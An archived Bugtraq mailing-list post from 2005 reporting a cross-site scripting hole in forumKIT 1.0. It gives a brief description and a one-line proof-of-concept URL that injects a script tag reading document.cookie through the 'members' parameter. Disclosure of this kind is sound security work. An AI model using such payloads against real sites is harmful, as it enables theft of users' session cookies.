[38183] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

XSS Vulnerability in ForumKIT

daemon@ATHENA.MIT.EDU (tom cruise)
Thu Jan 13 13:08:56 2005

Date: 13 Jan 2005 11:17:00 -0000
Message-ID: <20050113111700.12211.qmail@www.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: tom cruise <the.n3t@gmail.com>
To: bugtraq@securityfocus.com



Vulnerable System :
forumKIT 1.0

Description : 
an XSS is founded in the variable members that have the value 'true'
you can exchange it with XSS Code .

exploit : 
http://forum.target.com/f.aspx?members=">&lt;script&gt;alert(document.cookie);&lt;/script&gt;

this exploit is discovered by : neO
e-mail : al_modamer@hotmail.com


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[38183] in bugtraq

XSS Vulnerability in ForumKIT

daemon@ATHENA.MIT.EDU (tom cruise)Thu Jan 13 13:08:56 2005

daemon@ATHENA.MIT.EDU (tom cruise)
Thu Jan 13 13:08:56 2005